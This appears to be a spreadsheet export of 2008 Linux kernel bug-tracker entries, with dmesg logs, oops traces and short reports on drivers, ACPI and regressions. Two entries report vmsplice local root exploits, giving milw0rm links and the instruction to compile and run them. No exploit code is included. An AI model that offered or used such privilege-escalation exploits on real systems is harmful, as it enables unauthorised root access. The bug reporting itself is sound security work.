ahci 0000:04:00.0: AHCI 0001.0000 32 slots 2 ports 3 Gbps 0x3 impl SATA mode Feb 7 19:13:04 localhost [ 362.513202] ahci 0000:04:00.0: flags: 64bit ncq pm led clo pmp pio slum part Feb 7 19:13:04 localhost [ 362.513206] PCI: Setting latency timer of device 0000:04:00.0 to 64 Feb 7 19:13:04 localhost [ 362.513568] scsi7 : ahci Feb 7 19:13:04 localhost [ 362.514081] scsi8 : ahci Feb 7 19:13:04 localhost [ 362.514106] ata7: SATA max UDMA/133 abar m8192@0xfdafe000 port 0xfdafe100 irq 22 Feb 7 19:13:04 localhost [ 362.514110] ata8: SATA max UDMA/133 abar m8192@0xfdafe000 port 0xfdafe180 irq 22 Feb 7 19:13:05 localhost [ 362.818688] ata7: SATA link down (SStatus 0 SControl 300) Feb 7 19:13:05 localhost [ 363.427706] ata8: SATA link up 1.5 Gbps (SStatus 113 SControl 300) Feb 7 19:13:05 localhost [ 363.428912] ata8.00: ATA-7: ST3750330AS, SD04, max UDMA/133 Feb 7 19:13:05 localhost [ 363.428915] ata8.00: 1465149168 sectors, multi 0: LBA48 NCQ (depth 31/32) Feb 7 19:13:05 localhost [ 363.430484] ata8.00: configured for UDMA/133 Feb 7 19:13:05 localhost [ 363.429554] scsi 8:0:0:0: Direct-Access ATA ST3750330AS SD04 PQ: 0 ANSI: 5 Feb 7 19:13:05 localhost [ 363.429694] sd 8:0:0:0: [sdi] 1465149168 512-byte hardware sectors (750156 MB) Feb 7 19:13:05 localhost [ 363.429771] sd 8:0:0:0: [sdi] Write Protect is off Feb 7 19:13:05 localhost [ 363.429774] sd 8:0:0:0: [sdi] Mode Sense: 00 3a 00 00 Feb 7 19:13:05 localhost [ 363.429918] sd 8:0:0:0: [sdi] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA Feb 7 19:13:05 localhost [ 363.430030] sd 8:0:0:0: [sdi] 1465149168 512-byte hardware sectors (750156 MB) Feb 7 19:13:05 localhost [ 363.430105] sd 8:0:0:0: [sdi] Write Protect is off Feb 7 19:13:05 localhost [ 363.430107] sd 8:0:0:0: [sdi] Mode Sense: 00 3a 00 00 Feb 7 19:13:05 localhost [ 363.430222] sd 8:0:0:0: [sdi] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA Feb 7 19:13:05 localhost [ 363.430224] sdi: sdi1 sdi2 sdi3 sdi4 &lt; sdi5 &gt; Feb 7 19:13:05 localhost [ 363.470136] sd 8:0:0:0: [sdi] Attached SCSI disk Feb 7 19:13:05 localhost [ 363.470170] sd 8:0:0:0: Attached scsi generic sg8 type 0 ############### drive is turned off ###################### Feb 7 19:13:52 localhost [ 410.461251] ata8: exception Emask 0x10 SAct 0x0 SErr 0x990000 action 0xa frozen Feb 7 19:13:52 localhost [ 410.461256] ata8: irq_stat 0x00400000, PHY RDY changed Feb 7 19:13:52 localhost [ 410.461259] ata8: SError: { PHYRdyChg 10B8B Dispar LinkSeq } Feb 7 19:13:52 localhost [ 410.461267] ata8: hard resetting link Feb 7 19:13:53 localhost [ 411.183002] ata8: SATA link down (SStatus 0 SControl 300) Feb 7 19:13:53 localhost [ 411.183013] ata8: failed to recover some devices, retrying in 5 secs Feb 7 19:13:58 localhost [ 416.175868] ata8: hard resetting link Feb 7 19:13:59 localhost [ 416.480379] ata8: SATA link down (SStatus 0 SControl 300) Feb 7 19:13:59 localhost [ 416.480388] ata8: failed to recover some devices, retrying in 5 secs Feb 7 19:14:04 localhost [ 421.473247] ata8: hard resetting link Feb 7 19:14:04 localhost [ 421.777761] ata8: SATA link down (SStatus 0 SControl 300) Feb 7 19:14:04 localhost [ 421.777773] ata8.00: disabled Feb 7 19:14:04 localhost [ 422.277938] ata8: EH complete Feb 7 19:14:04 localhost [ 422.277949] ata8.00: detaching (SCSI 8:0:0:0) Feb 7 19:14:04 localhost [ 422.278148] sd 8:0:0:0: [sdi] Synchronizing SCSI cache Feb 7 19:14:04 localhost [ 422.278172] sd 8:0:0:0: [sdi] Result: hostbyte=0x04 driverbyte=0x00 Feb 7 19:14:04 localhost [ 422.278192] sd 8:0:0:0: [sdi] Stopping disk Feb 7 19:14:04 localhost [ 422.278197] sd 8:0:0:0: [sdi] START_STOP FAILED Feb 7 19:14:04 localhost [ 422.278198] sd 8:0:0:0: [sdi] Result: hostbyte=0x04 driverbyte=0x00 ############### drive is turned on ###################### Feb 7 19:14:40 localhost [ 458.388903] ata8: exception Emask 0x10 SAct 0x0 SErr 0x4050000 action 0xa frozen Feb 7 19:14:40 localhost [ 458.388908] ata8: irq_stat 0x00000040, connection status changed Feb 7 19:14:40 localhost [ 458.388912] ata8: SError: { PHYRdyChg CommWake DevExch } Feb 7 19:14:40 localhost [ 458.388920] ata8: hard resetting link Feb 7 19:14:43 localhost [ 461.093772] ata8: classification failed Feb 7 19:14:43 localhost [ 461.093777] ata8: reset failed (errno=-22), retrying in 8 secs Feb 7 19:14:50 localhost [ 468.371925] ata8: hard resetting link Feb 7 19:14:53 localhost [ 471.077524] ata8: classification failed Feb 7 19:14:53 localhost [ 471.077529] ata8: reset failed (errno=-22), retrying in 8 secs Feb 7 19:15:00 localhost [ 478.355678] ata8: hard resetting link Feb 7 19:15:03 localhost [ 481.061277] ata8: classification failed Feb 7 19:15:03 localhost [ 481.061282] ata8: reset failed (errno=-22), retrying in 33 secs Feb 7 19:15:35 localhost [ 513.298813] ata8: limiting SATA link speed to 1.5 Gbps Feb 7 19:15:35 localhost [ 513.298817] ata8: hard resetting link Feb 7 19:15:38 localhost [ 516.004410] ata8: classfication failed, assuming ATA Feb 7 19:15:38 localhost [ 516.004421] ata8: SATA link up 1.5 Gbps (SStatus 113 SControl 310) Feb 7 19:16:08 localhost [ 545.955668] ata8.00: qc timeout (cmd 0xec) Feb 7 19:16:08 localhost [ 545.955678] ata8.00: failed to IDENTIFY (I/O error, err_mask=0x4) Feb 7 19:16:08 localhost [ 545.955681] ata8: failed to recover some devices, retrying in 5 secs ############### rmmod ahci is done ###################### Feb 7 19:16:13 localhost [ 550.948540] ata8: EH complete Feb 7 19:16:13 localhost [ 550.948732] ACPI: PCI interrupt for device 0000:04:00.0 disabled ############### drive is modprobe ahci is done ###################### Feb 7 19:16:40 localhost [ 577.634831] ahci 0000:04:00.0: version 3.0 Feb 7 19:16:40 localhost [ 577.634853] ACPI: PCI Interrupt 0000:04:00.0[A] -&gt; Link [APC2] -&gt; GSI 17 (level, low) -&gt; IRQ 22 Feb 7 19:16:41 localhost [ 578.633470] ahci 0000:04:00.0: AHCI 0001.0000 32 slots 2 ports 3 Gbps 0x3 impl SATA mode Feb 7 19:16:41 localhost [ 578.633475] ahci 0000:04:00.0: flags: 64bit ncq pm led clo pmp pio slum part Feb 7 19:16:41 localhost [ 578.633482] PCI: Setting latency timer of device 0000:04:00.0 to 64 Feb 7 19:16:41 localhost [ 578.633714] scsi9 : ahci Feb 7 19:16:41 localhost [ 578.633791] scsi10 : ahci Feb 7 19:16:41 localhost [ 578.633816] ata9: SATA max UDMA/133 abar m8192@0xfdafe000 port 0xfdafe100 irq 22 Feb 7 19:16:41 localhost [ 578.633819] ata10: SATA max UDMA/133 abar m8192@0xfdafe000 port 0xfdafe180 irq 22 Feb 7 19:16:41 localhost [ 578.939004] ata9: SATA link down (SStatus 0 SControl 300) Feb 7 19:16:43 localhost [ 581.227269] ata10: classification failed Feb 7 19:16:43 localhost [ 581.227273] ata10: reset failed (errno=-22), retrying in 8 secs Feb 7 19:16:53 localhost [ 591.211023] ata10: classification failed Feb 7 19:16:53 localhost [ 591.211028] ata10: reset failed (errno=-22), retrying in 8 secs Feb 7 19:17:03 localhost [ 601.194777] ata10: classification failed Feb 7 19:17:03 localhost [ 601.194781] ata10: reset failed (errno=-22), retrying in 33 secs Feb 7 19:17:36 localhost [ 633.849639] ata10: limiting SATA link speed to 1.5 Gbps Feb 7 19:17:38 localhost [ 636.137917] ata10: classfication failed, assuming ATA Feb 7 19:17:38 localhost [ 636.137928] ata10: SATA link up 1.5 Gbps (SStatus 113 SControl 310) Feb 7 19:18:08 localhost [ 666.089175] ata10.00: qc timeout (cmd 0xec) Feb 7 19:18:08 localhost [ 666.089186] ata10.00: failed to IDENTIFY (I/O error, err_mask=0x4) Feb 7 19:18:08 localhost [ 666.089189] ata10: failed to recover some devices, retrying in 5 secs Feb 7 19:18:16 localhost [ 673.370326] ata10: classification failed Feb 7 19:18:16 localhost [ 673.370332] ata10: reset failed (errno=-22), retrying in 8 secs Feb 7 19:18:26 localhost [ 683.356010] ata10: classification failed Feb 7 19:18:26 localhost [ 683.356015] ata10: reset failed (errno=-22), retrying in 8 secs Feb 7 19:18:36 localhost [ 693.337760] ata10: classification failed Feb 7 19:18:36 localhost [ 693.337765] ata10: reset failed (errno=-22), retrying in 33 secs ############## drive is turned off ##################### Feb 7 19:19:09 localhost [ 726.297135] ata10: SATA link down (SStatus 0 SControl 310) ############### rmmod ahci is done ###################### Feb 7 19:19:20 localhost [ 738.092615] ACPI: PCI interrupt for device 0000:04:00.0 disabled ############### modprobe ahci is done ###################### Feb 7 19:19:29 localhost [ 746.913039] ahci 0000:04:00.0: version 3.0 Feb 7 19:19:29 localhost [ 746.913060] ACPI: PCI Interrupt 0000:04:00.0[A] -&gt; Link [APC2] -&gt; GSI 17 (level, low) -&gt; IRQ 22 Feb 7 19:19:30 localhost [ 747.911889] ahci 0000:04:00.0: AHCI 0001.0000 32 slots 2 ports 3 Gbps 0x3 impl SATA mode Feb 7 19:19:30 localhost [ 747.911893] ahci 0000:04:00.0: flags: 64bit ncq pm led clo pmp pio slum part Feb 7 19:19:30 localhost [ 747.911899] PCI: Setting latency timer of device 0000:04:00.0 to 64 Feb 7 19:19:30 localhost [ 747.912262] scsi11 : ahci Feb 7 19:19:30 localhost [ 747.912366] scsi12 : ahci Feb 7 19:19:30 localhost [ 747.912391] ata11: SATA max UDMA/133 abar m8192@0xfdafe000 port 0xfdafe100 irq 22 Feb 7 19:19:30 localhost [ 747.912394] ata12: SATA max UDMA/133 abar m8192@0xfdafe000 port 0xfdafe180 irq 22 Feb 7 19:19:31 localhost [ 748.217467] ata11: SATA link down (SStatus 0 SControl 300) Feb 7 19:19:31 localhost [ 748.521972] ata12: SATA link down (SStatus 0 SControl 300) ############## drive is turned on ##################### Feb 7 19:19:41 localhost [ 758.280168] ata12: exception Emask 0x10 SAct 0x0 SErr 0x4050000 action 0xa frozen Feb 7 19:19:41 localhost [ 758.280173] ata12: irq_stat 0x00000040, connection status changed Feb 7 19:19:41 localhost [ 758.280176] ata12: SError: { PHYRdyChg CommWake DevExch } Feb 7 19:19:41 localhost [ 758.280184] ata12: hard resetting link Feb 7 19:19:43 localhost [ 760.985679] ata12: classification failed Feb 7 19:19:43 localhost [ 760.985684] ata12: reset failed (errno=-22), retrying in 8 secs Feb 7 19:19:51 localhost [ 768.263833] ata12: hard resetting link Feb 7 19:19:53 localhost [ 770.969432] ata12: classification failed Feb 7 19:19:53 localhost [ 770.969438] ata12: reset failed (errno=-22), retrying in 8 secs Feb 7 19:20:01 localhost [ 778.247586] ata12: hard resetting link Feb 7 19:20:03 localhost [ 780.953185] ata12: classification failed Feb 7 19:20:03 localhost [ 780.953190] ata12: reset failed (errno=-22), retrying in 33 secs Feb 7 19:20:36 localhost [ 813.190720] ata12: limiting SATA link speed to 1.5 Gbps Feb 7 19:20:36 localhost [ 813.190725] ata12: hard resetting link Feb 7 19:20:38 localhost [ 815.896318] ata12: classfication failed, assuming ATA Feb 7 19:20:38 localhost [ 815.896329] ata12: SATA link up 1.5 Gbps (SStatus 113 SControl 310) Feb 7 19:21:08 localhost [ 845.847580] ata12.00: qc timeout (cmd 0xec) Feb 7 19:21:08 localhost [ 845.847591] ata12.00: failed to IDENTIFY (I/O error, err_mask=0x4) Feb 7 19:21:08 localhost [ 845.847594] ata12: failed to recover some devices, retrying in 5 secs ############### rmmod ahci is done ###################### Feb 7 19:21:13 localhost [ 850.840453] ata12: EH complete Feb 7 19:21:13 localhost [ 850.839736] ACPI: PCI interrupt for device 0000:04:00.0 disabled ############## drive is turned off, on and modprobe ahci is done ##################### Feb 7 19:22:20 localhost [ 917.495408] ahci 0000:04:00.0: version 3.0 Feb 7 19:22:20 localhost [ 917.495430] ACPI: PCI Interrupt 0000:04:00.0[A] -&gt; Link [APC2] -&gt; GSI 17 (level, low) -&gt; IRQ 22 Feb 7 19:22:21 localhost [ 918.494237] ahci 0000:04:00.0: AHCI 0001.0000 32 slots 2 ports 3 Gbps 0x3 impl SATA mode Feb 7 19:22:21 localhost [ 918.494243] ahci 0000:04:00.0: flags: 64bit ncq pm led clo pmp pio slum part Feb 7 19:22:21 localhost [ 918.494250] PCI: Setting latency timer of device 0000:04:00.0 to 64 Feb 7 19:22:21 localhost [ 918.494484] scsi13 : ahci Feb 7 19:22:21 localhost [ 918.494564] scsi14 : ahci Feb 7 19:22:21 localhost [ 918.494588] ata13: SATA max UDMA/133 abar m8192@0xfdafe000 port 0xfdafe100 irq 22 Feb 7 19:22:21 localhost [ 918.494591] ata14: SATA max UDMA/133 abar m8192@0xfdafe000 port 0xfdafe180 irq 22 Feb 7 19:22:21 localhost [ 918.799878] ata13: SATA link down (SStatus 0 SControl 300) Feb 7 19:22:22 localhost [ 919.407887] ata14: SATA link up 1.5 Gbps (SStatus 113 SControl 300) Feb 7 19:22:22 localhost [ 919.409093] ata14.00: ATA-7: ST3750330AS, SD04, max UDMA/133 Feb 7 19:22:22 localhost [ 919.409096] ata14.00: 1465149168 sectors, multi 0: LBA48 NCQ (depth 31/32) Feb 7 19:22:22 localhost [ 919.410647] ata14.00: configured for UDMA/133 Feb 7 19:22:22 localhost [ 919.409520] scsi 14:0:0:0: Direct-Access ATA ST3750330AS SD04 PQ: 0 ANSI: 5 Feb 7 19:22:22 localhost [ 919.409580] sd 14:0:0:0: [sdi] 1465149168 512-byte hardware sectors (750156 MB) Feb 7 19:22:22 localhost [ 919.409589] sd 14:0:0:0: [sdi] Write Protect is off Feb 7 19:22:22 localhost [ 919.409591] sd 14:0:0:0: [sdi] Mode Sense: 00 3a 00 00 Feb 7 19:22:22 localhost [ 919.409602] sd 14:0:0:0: [sdi] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA Feb 7 19:22:22 localhost [ 919.409641] sd 14:0:0:0: [sdi] 1465149168 512-byte hardware sectors (750156 MB) Feb 7 19:22:22 localhost [ 919.409647] sd 14:0:0:0: [sdi] Write Protect is off Feb 7 19:22:22 localhost [ 919.409649] sd 14:0:0:0: [sdi] Mode Sense: 00 3a 00 00 Feb 7 19:22:22 localhost [ 919.409659] sd 14:0:0:0: [sdi] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA Feb 7 19:22:22 localhost [ 919.409661] sdi: sdi1 sdi2 sdi3 sdi4 &lt; sdi5 &gt; Feb 7 19:22:22 localhost [ 919.451333] sd 14:0:0:0: [sdi] Attached SCSI disk Feb 7 19:22:22 localhost [ 919.451370] sd 14:0:0:0: Attached scsi generic sg8 type 0 Feb 7 19:22:50 localhost [ 947.116521] kjournald starting. Commit interval 5 seconds Feb 7 19:22:50 localhost [ 947.117102] EXT3 FS on sdi3, internal journal Feb 7 19:22:50 localhost [ 947.117107] EXT3-fs: mounted filesystem with ordered data mode. I could put as much load as I wanted on the drive after this. I have run seatools short and long tests a couple of times and the drive itself is in great health. The drive in the same enclosure behaves fine as far as hotplug is concerned in my laptop which has a jmicron express card esata controller.</t>
  </si>
  <si>
    <t>ACPI Error (...): No handler for Region [ECOR] [EmbeddedControl] - thinkpad X61s</t>
  </si>
  <si>
    <t>2008-02-08 06:36 UTC</t>
  </si>
  <si>
    <t>2008-10-17 14:43 UTC</t>
  </si>
  <si>
    <t>Providing acpidump and dmesg output for ThinkPad x61s, as suggested on linux-acpi mailinglist [1] [1] http://marc.info/?l=linux-acpi&amp;m=120240964922311&amp;w=2</t>
  </si>
  <si>
    <t>acpi_osi="!Windows 2006" else cpufreq breaks - Fujitsu T2010</t>
  </si>
  <si>
    <t>2008-02-08 16:57 UTC</t>
  </si>
  <si>
    <t>2008-06-18 18:33 UTC</t>
  </si>
  <si>
    <t>10383 10454</t>
  </si>
  <si>
    <t>Hardware Environment: Fujitsu T2010 The DSDT table has some magic Vista extra 'functionality' that after about thirty seconds of uptime forces the CPU to sit at it's rock bottom frequency. Annoying. The fix is simple, pass 'acpi_osi="!Windows 2006"' to the kernel and the problem disappears. This of course is horrible so I turned to drivers/acpi/blacklist.c and added some useful (well I think so) functionality. I have attached a patch that lets you put into blacklist.c the following: ========= { .callback = dmi_invalidate_osi, .ident = "Fujitsu Lifebook T2010", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"), DMI_MATCH(DMI_PRODUCT_NAME, "LifeBook T2010"), }, .driver_data = "Windows 2006\0\0", }, driver_data contains a NULL byte seperated list of OSI interfaces you want to disable at runtime, the list is terminated with two NULL bytes. So another example would be "Windows 2006\0Windows 2001\0\0"...but not for my laptop :) I'll attach the patches to this bug report once I have created it, please consider it for inclusion; or point me to the Right Way(tm) to do it :) Cheers</t>
  </si>
  <si>
    <t>Two vmsplice local root exploits</t>
  </si>
  <si>
    <t>2008-02-09 15:00 UTC</t>
  </si>
  <si>
    <t>Slava Gorbunov</t>
  </si>
  <si>
    <t>2008-02-10 15:32 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: 2.6.17 Distribution: Gentoo Hardware Environment: Software Environment: Problem Description: Two root exploits have been reported: http://milw0rm.com/exploits/5093 http://milw0rm.com/exploits/5092 Both exploits cause kernel Oops or (randomly) give root privilegies to the user. Here is the same bug reported in gentoo bugzilla: http://bugs.gentoo.org/show_bug.cgi?id=209460 Steps to reproduce: Compile and run the exploit.</t>
  </si>
  <si>
    <t>Kernel local exploit (vmsplice)</t>
  </si>
  <si>
    <t>Linux 2.6.17 - 2.6.24.1</t>
  </si>
  <si>
    <t>2008-02-09 18:15 UTC</t>
  </si>
  <si>
    <t>kryss</t>
  </si>
  <si>
    <t>2008-02-15 10:42 UTC</t>
  </si>
  <si>
    <t>Good luck :) http://www.milw0rm.com/exploits/5092</t>
  </si>
  <si>
    <t>/proc/cpuinfo wrong about F00F bug, cache size on old Pentium</t>
  </si>
  <si>
    <t>2.6.24.1</t>
  </si>
  <si>
    <t>2008-02-10 04:50 UTC</t>
  </si>
  <si>
    <t>2008-09-11 03:37 UTC</t>
  </si>
  <si>
    <t>Linux version 2.6.24.1 (dave@yellowbeard) (gcc version 4.2.1) #3 Sat Feb 9 22:24:04 EST 2008 Running on a 166 MHz Pentium "Classic." Console messages during boot correctly note the presence of the F00F bug: Intel Pentium with F0 0F bug - workaround enabled. However, /proc/cpuinfo does not (and 0 cache is wrong too): processor : 0 vendor_id : GenuineIntel cpu family : 5 model : 2 model name : Pentium 75 - 200 stepping : 12 cpu MHz : 165.794 cache size : 0 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr mce cx8 bogomips : 332.94 clflush size : 32 Other possibly helpful info from dmesg: CPU: After generic identify, caps: 000001bf 00000000 00000000 00000000 00000000 00000000 00000000 00000000 CPU: After all inits, caps: 000001bf 00000000 00000000 00000000 00000000 0000000 0 00000000 00000000</t>
  </si>
  <si>
    <t>Local root privilege escalation - exploit already available - 2.6.23 2.6.24</t>
  </si>
  <si>
    <t>2.6.23 - 2.6.24</t>
  </si>
  <si>
    <t>2008-02-11 02:03 UTC</t>
  </si>
  <si>
    <t>Saverio Proto</t>
  </si>
  <si>
    <t>2008-05-03 11:22 UTC</t>
  </si>
  <si>
    <t>Bug in bonding driver - Kernel oops whenever driver is loaded with max_bonds parameter</t>
  </si>
  <si>
    <t>2008-02-11 15:04 UTC</t>
  </si>
  <si>
    <t>Emir Mahmutbegovic</t>
  </si>
  <si>
    <t>2008-05-03 11:15 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: 2.6.24.2 Distribution: Slackware / Debian GNU/Linux Hardware Environment: HP ProLiant DL380 G5 (Debian), Slackware Acer TravelMate 4001 Laptop Software Environment: Problem Description: Kernel oops whenever bonding driver with max_bonds=2 (or &gt; 2) is loaded ... Steps to reproduce: modprobe bonding mode=0 miimon=100 max_bonds=2 or modprobe bonding max_bonds=2 dmesg output (from slackware laptop / x86): BUG: unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: c028eeaf *pde = 00000000 Oops: 0000 [#1] SMP Modules linked in: bonding snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss ntfs pcmcia yenta_socket rsrc_nonstatic tifm_7xx1 tifm_core pcmcia_core snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm i2c_i801 snd_timer snd i2c_core shpchp snd_page_alloc ehci_hcd uhci_hcd pci_hotplug Pid: 2729, comm: modprobe Not tainted (2.6.24.2 #2) EIP: 0060:[&lt;c028eeaf&gt;] EFLAGS: 00010282 CPU: 0 EIP is at strnicmp+0x17/0x61 EAX: d8162800 EBX: 00000000 ECX: 00000010 EDX: 00000062 ESI: 00000010 EDI: 00000000 EBP: d8162801 ESP: d82c9f60 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process modprobe (pid: 2729, ti=d82c8000 task=df926550 task.ti=d82c8000) Stack: d8162c80 00000000 e0c76814 00000000 e0c67170 00000001 df80b700 e0c77180 00000001 00000000 0000000c d82c8000 e0afe05e e0c6ed14 e0c6ce70 e0c76c00 0805c098 0000000c c014e355 b7e7a008 0805c098 c0106f12 b7e7a008 00019477 Call Trace: [&lt;e0c67170&gt;] bond_create+0x4a/0x162 [bonding] [&lt;e0afe05e&gt;] bonding_init+0x5e/0xf0 [bonding] [&lt;c014e355&gt;] sys_init_module+0x91/0x11b [&lt;c0106f12&gt;] syscall_call+0x7/0xb [&lt;c0470000&gt;] sctp_setsockopt_bindx+0xe8/0x127 ======================= Code: 08 fe dc ba 98 c7 40 0c 76 54 32 10 c7 40 10 f0 e1 d2 c3 c3 55 89 c5 57 89 d7 31 d2 56 89 ce 53 31 db 85 c9 74 42 0f b6 55 00 45 &lt;0f&gt; b6 1f 47 84 d2 74 35 84 db 74 31 38 da 74 2a 0f b6 c2 88 d1 EIP: [&lt;c028eeaf&gt;] strnicmp+0x17/0x61 SS:ESP 0068:d82c9f60 ---[ end trace 75761717808bf4ee ]--- dmesg output (from Debian x86_64 - HP ProLiant DL380): Unable to handle kernel NULL pointer dereference at 0000000000000000 RIP: [&lt;ffffffff8030271e&gt;] strnicmp+0x12/0x5f PGD 223005067 PUD 223b22067 PMD 0 Oops: 0000 [1] SMP CPU 7 Modules linked in: bonding mptctl mptbase fan ac battery ipv6 dm_snapshot dm_mirror dm_mod loop usbhid ide_cd cdrom bnx2 generic thermal ipmi_si piix serio_raw evdev shpchp psmouse pci_hotplug container pcspkr ide_core ipmi_msghandler uhci_hcd button processor ehci_hcd e1000 ext3 jbd mbcache reiserfs cciss Pid: 12469, comm: modprobe Not tainted 2.6.24.2 #1 RIP: 0010:[&lt;ffffffff8030271e&gt;] [&lt;ffffffff8030271e&gt;] strnicmp+0x12/0x5f RSP: 0018:ffff81022339fe00 EFLAGS: 00010202 RAX: ffff81022307e6c0 RBX: ffffffff88233918 RCX: 00000000000020e7 RDX: 0000000000000010 RSI: 0000000000000000 RDI: ffff81022307e000 RBP: 0000000000000000 R08: ffff810223b90362 R09: 0000000000000010 R10: ffffffff8822d60b R11: 0000000000000001 R12: 0000000000000000 R13: ffffffff88234b00 R14: ffff81022307e7c8 R15: 0000000000000000 FS: 00002b07aa3166e0(0000) GS:ffff81022743bd00(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 0000000000000000 CR3: 000000022339c000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process modprobe (pid: 12469, threadinfo ffff81022339e000, task ffff8102239aa000) Stack: ffffffff882200ce ffff8102239ad000 0000000000000001 ffff8102274273c0 0000000000000000 0000000000000001 ffffc20011bef960 ffff810225c88540 ffffffff8809f7bf ffffffff882340c0 ffffffff882340c0 ffff8102263f7f00 Call Trace: [&lt;ffffffff882200ce&gt;] :bonding:bond_create+0x4e/0x30e [&lt;ffffffff8809f7bf&gt;] :bonding:bonding_init+0x7bf/0x85d [&lt;ffffffff8024f752&gt;] sys_init_module+0x176d/0x183f [&lt;ffffffff8020be8e&gt;] system_call+0x7e/0x83 Code: 8a 0e 48 ff c7 48 ff c6 45 84 c0 74 36 84 c9 74 32 41 38 c8 RIP [&lt;ffffffff8030271e&gt;] strnicmp+0x12/0x5f RSP &lt;ffff81022339fe00&gt; CR2: 0000000000000000 ---[ end trace ba3d7089e7da64fa ]---</t>
  </si>
  <si>
    <t>2.6.25-rc1</t>
  </si>
  <si>
    <t>Function keys stop working after 2.6.24-rc3 - FSC Esprimo Mobile V5505</t>
  </si>
  <si>
    <t>2008-02-12 01:29 UTC</t>
  </si>
  <si>
    <t>Jan-Simon Möller</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24-rc3 Earliest failing kernel version: 2.6.24-rc3 after 5870a8cd23181703cc76f88f630372f8602c7648 Distribution: openSuSE 10.3 Hardware Environment: Laptop, FSC Esprimo Mobile V5505 Software Environment: ? Problem Description: Brightness function keys stop working after this revision. Brightness changes to low after power is plugged and higher if unplugged (might be powersave issue, thus - but keys remain unusable). Steps to reproduce: Use kernel later than 2.6.24-rc3 after commit 5870a8cd23181703cc76f88f630372f8602c7648 See Bug 9663 for bisection. Was not solved there. Could not reopen there. I can use 2.6.25-rc1 if i only revert 5870a8cd23181703cc76f88f630372f8602c7648 !</t>
  </si>
  <si>
    <t>e1000e driver with 82566DM-2 controller doesn't strip crc from frames</t>
  </si>
  <si>
    <t>2008-02-12 01:50 UTC</t>
  </si>
  <si>
    <t>Johan Andersson</t>
  </si>
  <si>
    <t>2008-02-15 10:23 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: n/a Earliest failing kernel version: 2.6.24 Distribution: Gentoo 2007.0 Hardware Environment: HP Compaq dc7800p Software Environment: n/a Problem Description: The e1000e driver doesn't strip the ethernet frame crc is used with the 82566DM-2 chip. This will result, among other things, that bridging doesn't work together with this chip. Reverting commit 140a74802894e9db57e5cd77ccff77e590ece5f3 fixes this issue but has performance implications. Steps to reproduce: Send a ping and monitor the responce with tcpdump.</t>
  </si>
  <si>
    <t>suspend to ram doesn't work anymore on Thinkpad T61 with Intel X3100</t>
  </si>
  <si>
    <t>2008-02-12 14:02 UTC</t>
  </si>
  <si>
    <t>Yves-Alexis Perez</t>
  </si>
  <si>
    <t>2008-02-17 04:15 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24.2 Earliest failing kernel version: 2.6.25-rc1 Distribution: Debian Sid Hardware Environment: Thinkpad T61 Software Environment: Problem Description: Suspend to ram doesn't work anymore on my thinkpad t61 with 2.6.25-rc1. On 2.6.24 I had to pass acpi_sleep=s3bios at boot time and suspend with s2ram -f -a 3. On 2.6.25-rc1 doing (on console, with X not running) that leads to a blank screen and the “sleep” led (the moon) on the thinkpad blinks (like when it is currently suspending), but nothing happens then. If I can make some more tests, or if you need more info, please ask. I hope this is no duplicate. Cheers, -- Yves-Alexis Steps to reproduce:</t>
  </si>
  <si>
    <t>2.6.25-rc2</t>
  </si>
  <si>
    <t>[ata crash] Re: Linux 2.6.25-rc1</t>
  </si>
  <si>
    <t>2008-02-13 04:54 UTC</t>
  </si>
  <si>
    <t>2008-02-17 15:08 UTC</t>
  </si>
  <si>
    <t>Subject : [ata crash] Re: Linux 2.6.25-rc1 Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; Date : 2008-02-12 09:18 References : http://lkml.org/lkml/2008/2/12/67 Handled-By : Tejun Heo &lt;htejun@gmail.com&gt; Patch : http://lkml.org/lkml/2008/2/13/111 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline or the report is rejected.</t>
  </si>
  <si>
    <t>[BUG] 2.6.25-rc1-git1 softlockup while bootup on powerpc</t>
  </si>
  <si>
    <t>2.6.25-rc1-git1</t>
  </si>
  <si>
    <t>2008-02-13 05:00 UTC</t>
  </si>
  <si>
    <t>2008-02-19 05:20 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] 2.6.25-rc1-git1 softlockup while bootup on powerpc Submitter : Kamalesh Babulal &lt;kamalesh@linux.vnet.ibm.com&gt; Date : 2008-02-12 08:09 References : http://lkml.org/lkml/2008/2/12/44 Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline or the report is rejected.</t>
  </si>
  <si>
    <t>2.6.25-rc1 xen pvops regression</t>
  </si>
  <si>
    <t>2008-02-13 05:21 UTC</t>
  </si>
  <si>
    <t>2008-02-17 04:29 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc1 xen pvops regression Submitter : Jody Belka &lt;lists-lkml@pimb.org&gt; Date : 2008-02-13 00:54 References : http://lkml.org/lkml/2008/2/12/555 Handled-By : Jeremy Fitzhardinge &lt;jeremy@goop.org&gt; Patch : http://lkml.org/lkml/2008/2/13/187 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.24-git2: Oracle 11g VKTM process enters R state on startup and is unkillable [still broken in 2.6.25-rc1]</t>
  </si>
  <si>
    <t>2.6.24-git2</t>
  </si>
  <si>
